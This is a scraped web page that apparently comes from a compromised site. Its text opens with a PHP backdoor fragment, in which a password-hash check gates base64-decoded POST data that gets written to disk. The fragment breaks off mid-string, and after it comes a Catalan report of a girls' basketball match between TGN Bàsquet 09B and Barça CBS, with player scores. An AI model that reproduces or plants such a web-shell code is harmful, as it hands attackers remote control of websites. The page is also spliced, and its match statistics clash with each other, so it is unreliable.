function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra un gran rival! -

Derrota contra un gran rival!

Updated: octubre 18, 2022

Partit de l’Infantil femení 09B contra un rival de molt nivell, el Barça CBS, al qual el TGN va voler competir-li, i ho va fer. L’equip Lila va mostrar la seva millor cara en defensa. Així, durant els primers catorze minuts es va mantenir la igualtat al marcador. El TGN no va deixar que el Barça agafés diferències, i només per una mala ratxa de pèrdues en dos minuts a partir del minut 14, l’equip blaugrana va aconseguir agafar una diferència de 7-12 punts que mantindria la resta del matx.

Destacable la tasca en el rebot de les locals, que va permetre diverses cistelles en segones oportunitats, i la valentia a l’1×1 de diverses jugadores per donar alternatives en l’aspecte ofensiu del partit. A més es va començar a veure voluntat de desenvolupar el joc en estàtic que estem treballant als entrenaments.

TGN BÀSQUET 09B: 54 – BARÇA CBS  B: 71
PARCIALS: 12-13, 17-23, 13-18, 12-17

TGN BÀSQUET 09B: 11/20 tirs lliures. 12 faltes. Eliminada: -Montell (11), Sabate (11), Meroño (10), Prades (1), Sala (5) —cinc inicial—Burjales (8), Giramé (1), Diez (0), Gandía (2), Fernández (1) i Carayol (4).
LES XIFRES DEL PARTIT:  0 triples.  8/19.   tirs lliures. 17 faltes.

BARÇA CBS B: Nomen (6), Sole (6), Jeremias (12), Termens (11), Martínez (20) —cinc inicial— Bayod (0), Basanta (2), Loran (8), Sánchez (0), Pelaez (0) i Romeo (6). 2 triple: Martínez (2).
LES XIFRES DEL PARTIT: 11/20 tirs lliures. 12 faltes.